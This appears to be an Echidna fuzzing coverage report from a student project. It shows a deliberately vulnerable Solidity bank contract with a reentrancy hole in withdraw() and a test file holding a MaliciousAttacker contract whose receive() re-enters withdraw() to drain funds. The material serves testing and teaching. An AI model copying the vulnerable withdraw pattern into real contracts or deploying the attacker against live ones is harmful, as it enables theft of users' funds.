/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 | *   | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 |     |     function deposit() public payable {
  8 |     |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 |     |     function withdraw() public {
 12 |     |         uint256 balance = balances[msg.sender];
 13 |     |         require(balance > 0, "Insufficient balance");
 14 |     | 
 15 |     |         // Enviar la cantidad retirada al llamador (vulnerable a reentrancy)
 16 |     |         (bool success, ) = msg.sender.call{value: balance}("");
 17 |     |         require(success, "Transfer failed");
 18 |     | 
 19 |     |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | 
  2 |     | // SPDX-License-Identifier: UNLICENSED
  3 |     | pragma solidity ^0.8.13;
  4 |     | 
  5 |     | 
  6 |     | 
  7 |     | 
  8 |     | import "../contracts/VulnerableBank.sol";
  9 |     | 
 10 |     | 
 11 |     | 
 12 |     | 
 13 | *   | contract MaliciousAttacker {
 14 |     |    VulnerableBank public bank;
 15 |     |    uint256 public stolen;
 16 |     | 
 17 |     | 
 18 | *   |    constructor(address _target) {
 19 | *   |        bank = VulnerableBank(_target);
 20 |     |    }
 21 |     | 
 22 |     | 
 23 |     |    function deposit() external payable {
 24 |     |        bank.deposit{value: msg.value}();
 25 |     |    }
 26 |     | 
 27 |     | 
 28 |     |    function attack() external {
 29 |     |        bank.withdraw();
 30 |     |    }
 31 |     | 
 32 |     | 
 33 |     |    receive() external payable {
 34 |     |        stolen += msg.value;
 35 |     |        if (address(bank).balance > 0) {
 36 |     |            bank.withdraw();
 37 |     |        }
 38 |     |    }
 39 |     | }
 40 |     | 
 41 |     | 
 42 |     | 
 43 |     | 
 44 | *r  | contract ReentrancyEchidnaTest {
 45 |     |     VulnerableBank bank;
 46 |     |     MaliciousAttacker attacker;
 47 |     | 
 48 | *   |     constructor() {
 49 | *   |         bank = new VulnerableBank();
 50 | *   |         attacker = new MaliciousAttacker(address(bank));
 51 |     |     }
 52 |     | 
 53 |     |     // ✅ Setup stateless - Echidna puede fuzzear esto fácilmente
 54 |     |     function echidna_bank_not_drained() public returns (bool) {
 55 |     |         uint256 initialBalance = 100 ether;  // Valor fijo
 56 |     |         
 57 |     |         // Pre-fund el banco usando el test contract
 58 |     |         bank.deposit{value: initialBalance}();
 59 |     |         
 60 |     |         // Attack
 61 |     |         attacker.deposit{value: 1 ether}();
 62 |     |         attacker.attack();
 63 |     |         
 64 |     |         return address(bank).balance >= initialBalance / 2;  // Más realista
 65 |     |     }
 66 |     | 
 67 |     |     function echidna_attacker_cannot_steal_all() public returns (bool) {
 68 |     |         bank.deposit{value: 100 ether}();
 69 |     |         attacker.deposit{value: 1 ether}();
 70 |     |         attacker.attack();
 71 |     |         return attacker.stolen() < 100 ether;
 72 |     |     }
 73 |     | }
 74 |     | 

